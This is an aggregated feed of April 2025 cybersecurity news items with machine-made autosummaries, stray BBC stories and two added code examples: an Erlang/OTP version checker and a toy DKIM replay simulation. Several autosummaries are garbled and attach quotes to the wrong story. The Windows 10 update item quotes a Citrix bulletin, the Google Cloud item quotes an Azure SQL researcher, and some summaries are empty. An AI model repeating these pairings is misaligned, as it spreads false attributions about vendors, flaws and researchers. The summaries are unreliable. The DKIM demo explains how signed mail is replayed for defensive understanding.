Autosummary: A brief description of each of the threat actors is below: UNC1069 (active since at least April 2018), which targets diverse industries for financial gain using social engineering ploys by sending fake meeting invites and posing as investors from reputable companies on Telegram to gain access to victims' digital assets and cryptocurrency; UNC4899 (active since 2022), which is known for orchestrating job-themed campaigns that deliver malware as part of a supposed coding assignment and has previously staged supply chain compromises for financial gain (overlaps with Jade Sleet, PUKCHONG, Slow Pisces, TraderTraitor, and UNC4899); and UNC5342 (active since January 2024), which is also known for employing job-related lures to trick developers into running malware-laced projects (overlaps with Contagious Interview, DeceptiveDevelopment, DEV#POPPER, and Famous Chollima). Another North Korean threat actor of note is UNC4736, which has singled out the blockchain industry by trojanizing trading software applications and has been attributed to a cascading supply chain attack on 3CX in early 2023. "


    Mourners visit Pope Francis lying in state at St Peter's Basilica

    government
    2025-04-23 https://www.bbc.com/news/articles/cn91e1w12ljo
    The body of the pontiff, who died on Monday, has been moved into the church for a period of public mourning. "

Autosummary: To her, Pope Francis meant "hope", and his more progressive social views were "very important", she said. Fredrik, who is from Ghana but came from Poland, said the Pope had "done his best" and "it is left to us to continue the good works". The pontiff's body, laid out in an open coffin, was moved to the church in a formal procession. Mourners are paying their respects to Pope Francis, whose body was moved from his Vatican residence to St Peter's Basilica before his funeral on Saturday. "


    Ex-Brazil boss Tite takes break to preserve health

    latam
    2025-04-23 https://www.bbc.com/sport/football/articles/cg41g2g1rl4o
Former Brazil head coach Tite is to take an indefinite break from football to take care of his mental and physical health. "

    Autosummary: "


    How fraudsters abuse Google Forms to spread scams

    financial
    2025-04-23 https://www.welivesecurity.com/en/scams/how-fraudsters-abuse-google-forms-spread-scams/
    The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe. "

Autosummary: It is favored by cybercriminals because it is: free, meaning threat actors can launch campaigns at scale with a potentially lucrative return on their investment; trusted by users, which increases the chances of victims believing that the Google Form they’re being sent or redirected to is legitimate; a legitimate service, meaning that malicious Google Forms and links to malicious forms are often waved through by traditional email security tools; and easy to use, which is good for users but also handy for cybercriminals, meaning they can launch convincing phishing campaigns with very little effort or prior knowledge of the tool. Cybercriminals also take advantage of the fact that Google Forms communications are encrypted with TLS, which may make it harder for security tools to peer in and check for any malicious activity. Either way, the end goal is usually to: harvest your log-ins, which can then be used to hijack accounts and commit identity fraud; steal your card details or banking/crypto information in order to take over these accounts and drain them of funds or commit payment fraud; or persuade you to click on a link in the malicious Google Form that redirects you to a site which covertly installs malware on your machine. Call back phishing: attackers send you a malicious Google Form crafted to trick you into calling a phone number listed on it. Attacks in the wild: among the real-world campaigns security researchers have seen in recent years is BazarCall, a vishing-type threat in which victims received an email containing a malicious Google Form impersonating PayPal, Netflix, or one of several other big-name brands. Here are some of the main techniques to look out for: phishing-related forms, where threat actors create Google Forms designed to spoof legitimate brands, such as log-in pages for social media sites, banks and universities, or even payment pages. "


    Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware

    exploits government
    2025-04-22 https://thehackernews.com/2025/04/lotus-panda-hacks-se-asian-governments.html
    The China-linked cyber espionage group tracked as Lotus Panda has been attributed to a campaign that compromised multiple organizations in an unnamed Southeast Asian country between August 2024 and February 2025. "Targets included a government ministry, an air traffic control organization, a telecoms operator, and a construction company," the Symantec Threat Hunter Team said in a new report "

    Autosummary: Then last month, Cisco Talos connected the Lotus Panda actor to intrusions aimed at government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan with a backdoor known as Sagerunex. "


    Abilene city, Texas, takes systems offline following a cyberattack

    government ciber
    2025-04-22 https://securityaffairs.com/176793/hacking/abilene-city-texas-takes-systems-offline-following-a-cyberattack.html
Abilene, Texas, shut down systems after a cyberattack caused server issues. IT staff and experts are investigating the security incident. The incident occurred on April 18, 2025; emergency services remained operational, and no financial irregularities were found. “On April 18, 2025, City officials received […] "

Autosummary: Pierluigi Paganini, April 22, 2025. Abilene, Texas, shut down systems after a cyberattack caused server issues. "


    Perforce Puppet update accelerates vulnerability remediation

    exploits
    2025-04-22 https://www.helpnetsecurity.com/2025/04/22/perforce-puppet-enterprise-advanced/

    Perforce Software announced its latest platform update for Puppet Enterprise Advanced, designed to streamline DevSecOps practices and fortify enterprise security postures. This release incorporates more advanced and proactive remediation options, allowing organizations to accelerate their response to security vulnerabilities by fostering greater collaboration between platform and security teams. A 2024 study by Statista reported that the average age of cyber vulnerabilities is 229 days, leaving companies and their customers vulnerable to security breaches and being … More

    The post Perforce Puppet update accelerates vulnerability remediation appeared first on Help Net Security.

    "

    Autosummary: "


    PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433)

    exploits
    2025-04-22 https://www.helpnetsecurity.com/2025/04/22/working-poc-exploit-for-critical-erlang-otp-ssh-bug-is-public-cve-2025-32433/

    There are now several public proof-of-concept (PoC) exploits for a maximum-severity vulnerability in the Erlang/OTP SSH server (CVE-2025-32433) unveiled last week. “All users running an SSH server based on the Erlang/OTP SSH library are likely to be affected by this vulnerability. If your application uses Erlang/OTP SSH to provide remote access, assume you are affected,” Ruhr University Bochum researchers, who discovered and reported the flaw, said. About CVE-2025-32433 Erlang/OTP SSH is a set of libraries … More

    The post PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) appeared first on Help Net Security.

    "

    Autosummary: Consequently, this vulnerability may lead to full compromise of hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks,” Fabian Bäumer, Chair for Network and Data Security at Ruhr University Bochum, explained in a post on the OSS-SEC mailing list last Wednesday. “Users are advised to update to OTP-27.3.3 (for OTP-27), OTP-26.2.5.11 (for OTP-26), or OTP-25.3.2.20 (for OTP-25) to mitigate this issue,” the CVE-2025-32433 advisory recommends. "
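The advisory text above names three fixed releases, one per supported line, and the fix status of a host depends on which line it runs. The following is an added example, not part of the article or the advisory, that parses an installed OTP version string and compares it against those fixed releases. It assumes the version string is the content of the `OTP_VERSION` file that an installed release typically keeps under `<erl root>/releases/<major>/`, or an `OTP-x.y.z` tag; the hypothetical `not_covered` and `unsupported_line` outcomes mark versions the advisory does not name.

```python
"""Added example, not from the advisory: check an installed Erlang/OTP version
string against the fixed releases quoted for CVE-2025-32433."""
import re
import sys

# Fixed releases per supported line, as quoted in the advisory.
FIXED_IN = {25: (25, 3, 2, 20), 26: (26, 2, 5, 11), 27: (27, 3, 3)}


def parse_otp_version(text: str) -> tuple:
    """'OTP-27.3.2', '27.3.2' or '27.3.2\\n' -> (27, 3, 2)."""
    m = re.search(r"(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"no OTP version in {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def otp_ssh_status(version_text: str) -> str:
    """Return 'vulnerable', 'fixed', 'unsupported_line' (older than OTP-25: the
    advisory lists no fix, so treat as vulnerable) or 'not_covered' (newer than
    the lines the advisory names, check the current advisory)."""
    version = parse_otp_version(version_text)
    major = version[0]
    if major < min(FIXED_IN):
        return "unsupported_line"
    if major not in FIXED_IN:
        return "not_covered"
    # Tuple comparison is lexicographic, so (27, 3) < (27, 3, 3) as required.
    return "fixed" if version >= FIXED_IN[major] else "vulnerable"


if __name__ == "__main__":
    # Usage: pipe the OTP_VERSION file (or an 'OTP-x.y.z' tag) on stdin.
    print(otp_ssh_status(sys.stdin.read()))
```

On a host with Erlang installed, the version file can typically be located with `erl -noshell -eval 'io:format("~s", [filename:join([code:root_dir(), "releases", erlang:system_info(otp_release), "OTP_VERSION"])]), halt().'` and piped into the script. The check says nothing about exposure: only hosts that actually run the `ssh` application listen on the vulnerable server, so pair it with a process or port inventory.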


    GCP Cloud Composer Bug Let Attackers Elevate Access via Malicious PyPI Packages

    exploits
    2025-04-22 https://thehackernews.com/2025/04/gcp-cloud-composer-bug-let-attackers.html
Cybersecurity researchers have detailed a now-patched vulnerability in Google Cloud Platform (GCP) that could have enabled an attacker to elevate their privileges in the Cloud Composer workflow orchestration service that's based on Apache Airflow. "This vulnerability lets attackers with edit permissions in Cloud Composer escalate their access to the default Cloud Build service account, which "

Autosummary: "This vulnerability lets attackers with edit permissions in Cloud Composer escalate their access to the default Cloud Build service account, which has high-level permissions across GCP services like Cloud Build itself, Cloud Storage, and Artifact Registry," Liv Matan, senior security researcher at Tenable, said in a report shared with The Hacker News. "By manipulating the name of server-level firewall rules through T-SQL, a threat actor with privileged access to an Azure SQL Server can inject an implant that, based on specific user actions, deletes arbitrary Azure resources that the user has permissions for," security researcher Coby Abrams said. "


    Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials

    exploits
    2025-04-22 https://thehackernews.com/2025/04/phishers-exploit-google-sites-and-dkim.html
In what has been described as an "extremely sophisticated phishing attack," threat actors have leveraged an uncommon approach that allowed bogus emails to be sent via Google's infrastructure and redirect message recipients to fraudulent sites that harvest their credentials. "The first thing to note is that this is a valid, signed email – it really was sent from no-reply@google.com," Nick Johnson "

    Autosummary: "The first thing to note is that this is a valid, signed email – it really was sent from no-reply@google.com," Nick Johnson, the lead developer of the Ethereum Name Service (ENS), said in a series of posts on X. "It passes the DKIM signature check, and Gmail displays it without any warnings – it even puts it in the same conversation as other, legitimate security alerts. "
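The quoted point is that the message passed DKIM because it genuinely was signed by the sender's domain; a DKIM signature covers a chosen set of headers and the body, not the SMTP envelope, so a message forwarded verbatim to a new recipient still verifies. The following is an added example, not code from the article or from Google, of a stripped-down DKIM model that demonstrates this replay property. It assumes a constructed signer key (an HMAC stands in for the signer's RSA key so the example runs on the standard library alone), a simplified "relaxed" canonicalisation, and a constructed message; none of these are the article's data.

```python
"""Added example, not code from the article or from Google: a stripped-down
DKIM model showing why a replayed (forwarded verbatim) message still verifies.
An HMAC with a constructed key stands in for the signer's RSA key so this runs
on the standard library alone; the replay property does not depend on the
algorithm.  Canonicalisation is a simplified 'relaxed' form."""
import hashlib
import hmac
import re

SIGNER_KEY = b"constructed-selector-key"                  # stand-in for the signing domain's private key
SIGNED_HEADERS = ["from", "to", "cc", "subject", "date"]  # the h= tag: headers the signature covers


def _relaxed(value: str) -> str:
    return re.sub(r"\s+", " ", value).strip()


def _header(headers, name: str) -> str:
    """Value of the last instance of a header (DKIM selects bottom-up); '' if absent."""
    for n, v in reversed(headers):
        if n.lower() == name:
            return _relaxed(v)
    return ""


def _signing_input(headers, body: str) -> bytes:
    # Body uses bare '\n' in this example; DKIM hashes CRLF line endings.
    body_hash = hashlib.sha256(body.replace("\n", "\r\n").encode()).hexdigest()
    lines = [f"{h}:{_header(headers, h)}" for h in SIGNED_HEADERS] + [f"bh={body_hash}"]
    return "\r\n".join(lines).encode()


def sign(message: dict) -> dict:
    """Return a copy with a DKIM-Signature header prepended.  Note what is NOT
    covered: the SMTP envelope (MAIL FROM / RCPT TO)."""
    tag = hmac.new(SIGNER_KEY, _signing_input(message["headers"], message["body"]), "sha256").hexdigest()
    sig = f"v=1; d=example.com; s=sel; h={':'.join(SIGNED_HEADERS)}; b={tag}"
    return {**message, "headers": [("DKIM-Signature", sig)] + message["headers"]}


def verify(message: dict) -> bool:
    m = re.search(r"b=([0-9a-f]+)", _header(message["headers"], "dkim-signature"))
    if not m:
        return False
    expected = hmac.new(SIGNER_KEY, _signing_input(message["headers"], message["body"]), "sha256").hexdigest()
    return hmac.compare_digest(m.group(1), expected)


def replay(message: dict, new_rcpt: str) -> dict:
    """What a relay does: headers and body untouched, only the envelope changes."""
    return {**message, "envelope": {**message["envelope"], "rcpt_to": new_rcpt}}


def delivered_to_signed_recipient(message: dict) -> bool:
    """Receiver-side corroboration: is the envelope recipient named in the signed
    To/Cc?  Legitimate forwarding and Bcc also fail this, so treat it as a signal."""
    rcpt = message["envelope"]["rcpt_to"].lower()
    covered = (_header(message["headers"], "to") + " " + _header(message["headers"], "cc")).lower()
    return rcpt in covered


# Constructed message: a genuine alert the signer sent to an address the attacker controls.
ORIGINAL = {
    "envelope": {"mail_from": "no-reply@example.com", "rcpt_to": "attacker@attacker.example"},
    "headers": [
        ("From", "Example Alerts <no-reply@example.com>"),
        ("To", "attacker@attacker.example"),
        ("Subject", "Security alert"),
        ("Date", "Tue, 22 Apr 2025 10:00:00 +0000"),
    ],
    "body": "A new sign-in was detected. Review it at https://sites.example.com/review\n",
}

if __name__ == "__main__":
    signed = sign(ORIGINAL)
    forwarded = replay(signed, "victim@victim.example")
    print("original verifies:", verify(signed), "| envelope matches To:", delivered_to_signed_recipient(signed))
    print("replay verifies:  ", verify(forwarded), "| envelope matches To:", delivered_to_signed_recipient(forwarded))
```

The signed copy and the forwarded copy are byte-identical above the envelope, so DKIM cannot tell them apart by design; any edit to a covered header or the body breaks the signature, which is why the attacker needs a genuine message whose content already serves the lure. The recipient-mismatch check is a corroborating signal, not a verdict, because mailing lists, auto-forwarding and Bcc produce the same mismatch for legitimate mail.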


    SK Telecom warns customer USIM data exposed in malware attack

    exploits Telcos
    2025-04-22 https://www.bleepingcomputer.com/news/security/sk-telecom-warns-customer-usim-data-exposed-in-malware-attack/
South Korea's largest mobile operator, SK Telecom, is warning that a malware infection allowed threat actors to access sensitive USIM-related information for customers. [...] "

    Autosummary: "


    Docker Malware Exploits Teneo Web3 Node to Earn Crypto via Fake Heartbeat Signals

    exploits
    2025-04-22 https://thehackernews.com/2025/04/docker-malware-exploits-teneo-web3-node.html
Cybersecurity researchers have detailed a malware campaign that's targeting Docker environments with a previously undocumented technique to mine cryptocurrency. The activity cluster, per Darktrace and Cado Security, represents a shift from other cryptojacking campaigns that directly deploy miners like XMRig to illicitly profit off the compute resources. This involves deploying a malware strain "

    Autosummary: "Typically, traditional cryptojacking attacks rely on using XMRig to directly mine cryptocurrency, however as XMRig is highly detected, attackers are shifting to alternative methods of generating crypto," Darktrace said. "


    Active! Mail RCE flaw exploited in attacks on Japanese orgs

    exploits
    2025-04-22 https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/
    An Active! Mail zero-day remote code execution vulnerability is actively exploited in attacks on large organizations in Japan. [...] "

Autosummary: While it's not widely used worldwide like Gmail or Outlook, Active! is often used as a groupware component in Japanese-language environments of large corporations, universities, government agencies, and banks. "


    Windows 10 KB5055612 preview update fixes a GPU bug in WSL2

    exploits
    2025-04-22 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5055612-preview-update-fixes-a-gpu-bug-in-wsl2/
    Microsoft has released the optional KB5055612 preview cumulative update for Windows 10 22H2 with two changes, including a fix for a GPU paravirtualization bug in Windows Subsystem for Linux 2 (WSL2). [...] "

    Autosummary: "As a workaround, stop the Session Recording Monitoring service, install the Microsoft security update, and enable the Session Recording Monitoring service," explains a Citrix support bulletin. "


    Millions of SK Telecom customers are potentially at risk following USIM data compromise

    Telcos
    2025-04-22 https://securityaffairs.com/176802/data-breach/sk-telecom-data-breach.html
    SK Telecom warned that threat actors accessed customer Universal Subscriber Identity Module (USIM) info through a malware attack. SK Telecom is South Korea’s largest wireless telecom company, a major player in the country’s mobile and tech landscape. It holds about 48% of the market share for mobile services, meaning around 34 million subscribers use its […] "

    Autosummary: The company offers cellular service, along with 5G development, AI services, IoT solutions, cloud computing, and smart city infrastructure. "


    Marks & Spencer confirms a cyberattack as customers face delayed orders

    ciber
    2025-04-22 https://www.bleepingcomputer.com/news/security/marks-and-spencer-confirms-a-cyberattack-as-customers-face-delayed-orders/
    Marks & Spencer (M&S) has disclosed that it is responding to a cyberattack over the past few days that has impacted operations, including its Click and Collect service. [...] "

    Autosummary: While M&S stores, its website, and its app remain operational, the company says that the cyberattack has caused some disruption to its operations. "


    Cybercriminals blend AI and social engineering to bypass detection

    ciber
    2025-04-21 https://www.helpnetsecurity.com/2025/04/21/adversaries-cybercrime-techniques/

Attackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Top five attack tactics: initial access remains the most frequently observed adversarial tactic, representing more than 27% of escalated alerts. In 2024, … More

    The post Cybercriminals blend AI and social engineering to bypass detection appeared first on Help Net Security.

    "

    Autosummary: AI has allowed attackers to bypass all the usual red flags you’re taught to look for, like grammatical errors, misspelled words, non-regional speech or writing, and a lack of context to your organization. “Attackers have honed their techniques to become faster and more powerful against a company’s defenses; conversely, security solutions are less able to withstand attacks on their own and need constant monitoring and tuning,” said Jim Broome, President and CTO for DirectDefense. "


    Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8)

    Linux
    2025-04-21 https://www.helpnetsecurity.com/2025/04/21/oracle-releases-unbreakable-enterprise-kernel-8-uek-8/

    Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More

    The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.

    "

    Autosummary: It’s based on the latest long-term stable Linux kernel and works on 64-bit Intel, AMD (x86-64), and Arm (aarch64) systems. "


    Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery

    exploits rusia-ucrania
    2025-04-21 https://thehackernews.com/2025/04/hackers-abuse-russian-bulletproof-host.html
    Cybersecurity researchers have disclosed a surge in "mass scanning, credential brute-forcing, and exploitation attempts" originating from IP addresses associated with a Russian bulletproof hosting service provider named Proton66. The activity, detected since January 8, 2025, targeted organizations worldwide, according to a two-part analysis published by Trustwave SpiderLabs last week.  "Net "

    Autosummary: " Trustwave"s latest analysis has revealed that the malicious requests originating from one of Proton66 net blocks (193.143.1[.]65) in February 2025 attempted to exploit some of the most recent critical vulnerabilities - CVE-2025-0108 - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS software - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS software CVE-2024-41713 - An insufficient input validation vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab - An insufficient input validation vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab CVE-2024-10914 - A command injection vulnerability D-Link NAS - A command injection vulnerability D-Link NAS CVE-2024-55591 & CVE-2025-24472 - Authentication bypass vulnerabilities in Fortinet FortiOS It"s worth noting that the exploitation of the two Fortinet FortiOS flaws has been attributed to an initial access broker dubbed Mora_001, which has been observed delivering a new ransomware strain called SuperBlack. "


    New sophisticated malware SuperCard X targets Androids via NFC relay attacks

    exploits
    2025-04-21 https://securityaffairs.com/176737/malware/supercard-x-a-new-sophisticate-malware-targets-androids-via-nfc-relay-attacks.html
‘SuperCard X’ – a new MaaS – targets Android devices via NFC relay attacks, enabling fraudulent POS and ATM transactions with stolen card data. Cleafy researchers discovered a new malware-as-a-service (MaaS) called SuperCard X targeting Android devices with NFC relay attacks for fraudulent cash-outs. Attackers promote the MaaS through Telegram channels; analysis shows SuperCard X builds […] "

Autosummary: Pierluigi Paganini, April 21, 2025. SuperCard X uses a modular setup with two apps: “Reader” (blue icon) is deployed on victim devices to capture NFC card data, and “Tapper” (green icon) runs on attacker devices to relay and misuse the stolen data. "


    Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware

    exploits
    2025-04-21 https://securityaffairs.com/176730/apt/russia-linked-apt29-targets-european-diplomatic-entities-with-grapeloader.html
    Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER. Check Point Research team reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) is behind a sophisticated phishing campaign targeting European diplomatic entities, using a new WINELOADER variant and a previously unknown malware called GRAPELOADER. “While the […] "

Autosummary: Pierluigi Paganini, April 21, 2025. Check Point Research reported that the Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) is behind a sophisticated phishing campaign targeting European diplomatic entities, using a new WINELOADER variant and a previously unknown malware called GRAPELOADER. "


    ⚡ THN Weekly Recap: iOS Zero-Days, 4Chan Breach, NTLM Exploits, WhatsApp Spyware & More

    exploits
    2025-04-21 https://thehackernews.com/2025/04/thn-weekly-recap-ios-zero-days-4chan.html
    Can a harmless click really lead to a full-blown cyberattack? Surprisingly, yes — and that’s exactly what we saw in last week’s activity. Hackers are getting better at hiding inside everyday actions: opening a file, running a project, or logging in like normal. No loud alerts. No obvious red flags. Just quiet entry through small gaps — like a misconfigured pipeline, a trusted browser feature, "

Autosummary: This week's list includes CVE-2025-2492 (ASUS), CVE-2025-24054 (Microsoft Windows), CVE-2025-32433 (Erlang/OTP), CVE-2021-20035 (SonicWall Secure Mobile Access 100 Series), CVE-2025-31200 and CVE-2025-31201 (Apple iOS, iPadOS, macOS Sequoia, tvOS, and visionOS), CVE-2025-24859 (Apache Roller), CVE-2025-1093 (AIHub theme), and CVE-2025-3278 (UrbanGo Membership plugin). 📰 Around the Cyber World: Google Makes :visited More Private. Google is finally taking steps to plug a long-standing privacy issue that, for over 20 years, enabled websites to determine users' browsing history through previously visited links. The countries with the most victims of this campaign are Mexico (456), India (100), Bahrain (82), Morocco (69), Pakistan (58), Indonesia (54), Israel (51), Uzbekistan (43), Algeria (38), and Cyprus (31); also targeted were victims in Spain (12), the Netherlands (11), Syria (11), Hungary (8), France (7), the United Kingdom (2), and the United States (1). 35 Countries Use Chinese Networks for Routing Mobile User Traffic: U.S. allies like Japan, South Korea, and New Zealand are among the 35 countries where mobile providers employ China-based networks, including China Mobile International, China Telecom Global, China Unicom Global, CITIC Telecom International, and PCCW Global Hong Kong, for routing sensitive mobile traffic, opening travelers and residents in those nations to potential surveillance. Some of the top observed malware families included web shells, Cobalt Strike, Akira, Lumma Stealer, LockBit, Fog, ChromeLoader, GootLoader, RansomHub, and Black Basta. The development comes as a 24-year-old Huddersfield man, Zak Coyne, was sentenced in the U.K. to eight-and-a-half years in prison for his role in creating, operating, and administering the LabHost service, which was used by more than 2,000 criminals to defraud victims all over the world. Mustang Panda Targets Myanmar with New Tooling: the China-linked threat actor known as Mustang Panda targeted an unspecified organization in Myanmar with an updated version of its signature backdoor, TONESHELL, in addition to debuting four new attack tools: two keyloggers (PAKLOG and CorKLOG), a utility for facilitating lateral movement (StarProxy), and a driver to evade endpoint detection and response (EDR) software (SplatCloak). The service is offered for $199 a month, with customizable phishing pages available for 17 Canadian banks, 4 U.S.-based banks, email providers, telecom companies, toll road collections, and crypto services. 🔔 Top News: North Korea Targets Crypto Developers with Fake Python Coding Challenges. The North Korea-linked threat actor known as Slow Pisces (aka Jade Sleet, PUKCHONG, TraderTraitor, and UNC4899) is targeting developers, particularly in the cryptocurrency sector, to deliver new stealer malware under the guise of a coding assignment. A coordinated operation conducted by Belgium, France, Germany, the Netherlands, Spain, and Türkiye has resulted in the arrests of 232 suspects and seizures of EUR300 million worth of assets, including 681 properties and 127 vehicles. "


    Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan

    exploits
    2025-04-21 https://thehackernews.com/2025/04/kimsuky-exploits-bluekeep-rdp.html
    Cybersecurity researchers have flagged a new malicious campaign related to the North Korean state-sponsored threat actor known as Kimsuky that exploits a now-patched vulnerability impacting Microsoft Remote Desktop Services to gain initial access. The activity has been named Larva-24005 by the AhnLab Security Intelligence Center (ASEC). "In some systems, initial access was gained through "

    Autosummary: "


    SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks

    financial exploits
    2025-04-21 https://thehackernews.com/2025/04/supercard-x-android-malware-enables.html
    A new Android malware-as-a-service (MaaS) platform named SuperCard X can facilitate near-field communication (NFC) relay attacks, enabling cybercriminals to conduct fraudulent cashouts. The active campaign is targeting customers of banking institutions and card issuers in Italy with an aim to compromise payment card data, fraud prevention firm Cleafy said in an analysis. There is evidence to "

    Autosummary: The new Android malware, the work of a Chinese-speaking threat actor, has been observed being propagated via three different bogus apps, duping victims into installing them via social engineering techniques like deceptive SMS or WhatsApp messages: Verifica Carta (io.dxpay.remotenfc.supercard11), SuperCard X (io.dxpay.remotenfc.supercard), and KingCard NFC (io.dxpay.remotenfc.supercard). The messages impersonate bank security alerts to induce a false sense of urgency by urging recipients to call a specific number to dispute the transaction. "


    Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan

    exploits
    2025-04-21 https://securityaffairs.com/176756/apt/kimsuky-apt-exploited-bluekeep-rdp-flaw-in-attacks-against-south-korea-and-japan.html
    Researchers spotted a new campaign by the North Korea-linked group Kimsuky, exploiting a patched Microsoft Remote Desktop Services flaw to gain initial access. While investigating a security breach, the AhnLab Security Intelligence Center (ASEC) researchers discovered a campaign by the North Korea-linked group Kimsuky, tracked as Larva-24005. Attackers exploited an RDP vulnerability to gain initial access to […] "

    Autosummary: Since September 2023, the North Korean APT has targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries. "


    "God chose this day" - World's Catholics mourn Pope's Easter death

    industry
    2025-04-21 https://www.bbc.com/news/articles/c5y656415lzo
    Members of the Catholic Church's global community of 1.4bn people are remembering the late Pope on Easter Monday. "

    Autosummary: "It was incredible to feel listened to... through the years I've told him I feel like Lazarus: you were dead, nobody hears you, nobody cares, and suddenly the most important person does care, and sincerely cares, and makes a big change." Worshippers gathered at Baclaran Church in Paranaque, Metro Manila, to pay their respects to the late Pope (image: Getty Images). Catholics in rebel-held Bukavu, a city in eastern Democratic Republic of Congo, have gathered at Notre-Dame de la Paix Cathedral to mourn. One woman who heard his address said: "He took his duty to the people so seriously - even when he was so unwell yesterday, he still came out, he was still part of the Easter mass, he still got to speak to us." "


    APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures

    exploits
    2025-04-20 https://thehackernews.com/2025/04/apt29-deploys-grapeloader-malware.html
    The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER. "While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool "

    Autosummary: Although the exact nature of the payload is unclear, Check Point said it identified updated WINELOADER artifacts uploaded to the VirusTotal platform with compilation timestamps matching that of "AppvIsvSubsystems64.dll." "With this information, and the fact that GRAPELOADER replaced ROOTSAW, an HTA downloader used in past campaigns to deliver WINELOADER, we believe that GRAPELOADER ultimately leads to the deployment of WINELOADER," the cybersecurity company said. It's worth noting that the downloader and the LNK dropper refer to the same two payloads that the Symantec Threat Hunter team, part of Broadcom, revealed earlier this month as part of an attack chain distributing an updated version of the GammaSteel stealer: NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms (Downloader) and NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms (LNK dropper). "Gamaredon operates as a critical component of Russia's cyber operations strategy, particularly in its ongoing war with Ukraine," the company said. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 42

    exploits
    2025-04-20 https://securityaffairs.com/176725/malware/security-affairs-malware-newsletter-round-42.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Malicious NPM Packages Targeting PayPal Users; New Malware Variant Identified: ResolverRAT Enters the Maze; Nice chatting with you: what connects cheap Android smartphones, WhatsApp and cryptocurrency theft?; BPFDoor’s Hidden Controller Used Against Asia, Middle East […] "

    Autosummary: "


    State-sponsored hackers embrace ClickFix social engineering tactic

    government
    2025-04-20 https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
    ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. [...] "

    Autosummary: ClickFix page for fake device registration (Source: Microsoft). A new report from Proofpoint reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations. "


    Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems

    Linux
    2025-04-19 https://thehackernews.com/2025/04/rogue-npm-packages-mimic-telegram-bot.html
    Cybersecurity researchers have uncovered three malicious packages in the npm registry that masquerade as a popular Telegram bot library but harbor SSH backdoors and data exfiltration capabilities. The packages in question are listed below: node-telegram-utils (132 downloads), node-telegram-bots-api (82 downloads), and node-telegram-util (73 downloads). According to supply chain "

    Autosummary: According to supply chain security firm Socket, the packages are designed to mimic node-telegram-bot-api, a popular Node.js Telegram Bot API with over 100,000 weekly downloads. "


    Attackers exploited SonicWall SMA appliances since January 2025

    exploits
    2025-04-19 https://securityaffairs.com/176706/security/attackers-exploited-sonicwall-sma-appliances-since-january-2025.html
    Threat actors are actively exploiting a remote code execution flaw in SonicWall Secure Mobile Access (SMA) appliances since January 2025. Arctic Wolf researchers warn that threat actors actively exploit a vulnerability, tracked as CVE-2021-20035 (CVSS score of 7.1), in SonicWall Secure Mobile Access (SMA) since at least January 2025. The vulnerability is an OS Command […] "

    Autosummary: The vulnerability impacts SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices; the vendor addressed the vulnerability in September 2021. "


    New Android malware steals your credit cards for NFC relay attacks

    exploits
    2025-04-19 https://www.bleepingcomputer.com/news/security/supercard-x-android-malware-use-stolen-cards-in-nfc-relay-attacks/
    A new malware-as-a-service (MaaS) platform named "SuperCard X" has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. [...] "

    Autosummary: A new malware-as-a-service (MaaS) platform named "SuperCard X" has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. "


    Critical Erlang/OTP SSH RCE bug now has public exploits, patch now

    exploits
